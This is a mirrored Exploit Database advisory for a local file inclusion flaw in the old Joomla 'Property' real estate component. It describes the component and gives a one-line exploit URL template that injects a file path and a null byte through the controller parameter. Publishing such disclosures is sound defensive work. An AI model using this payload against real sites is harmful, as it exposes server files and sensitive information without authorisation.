Joomla! Component Property – Local File Inclusion

• Exploit Database
• 115 阅读

• 作者： Chip d3 bi0s
  日期： 2010-03-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11851/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50

  --------------------------------------------------------------------------------- Joomla Component Property Local File Inclusion ---------------------------------------------------------------------------------   Author: Chip D3 Bi0s Group : LatinHackTeam Email & msn : chipdebios[alt+64]gmail.com Date: 22 March 2010 Critical Lvl: Moderate Impact : Exposure of sensitive information Where : From Remote ---------------------------------------------------------------------------   Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~     Application : Property Developer : este8an License : GPLtype: Non Commercial Date Added : 22 January 2009 Download : http://www.com-property.com/download.html?func=select&id=2   Description :   Property is a new Real Estate component 100% FREE native Joomla 1.5. compatible with sh404sef and joomfish.   Add Profiles (Agent data: Client is a user joomla registered) Can change permissions in User Manager to 'Agent' , then this user can publish various properties.   Control Panel button Create Menus automatically creates menus in FrontEnd : All Properties, My Short List(Favorites), My Panel(to publish properties), My Profile.   You can change names after created. --------------------------------------------------------------------------- how to exploit   http://localhost/index.php?option=com_properties&controller=[LFI]%00     +++++++++++++++++++++++++++++++++++++++ [!] Produced in South America +++++++++++++++++++++++++++++++++++++++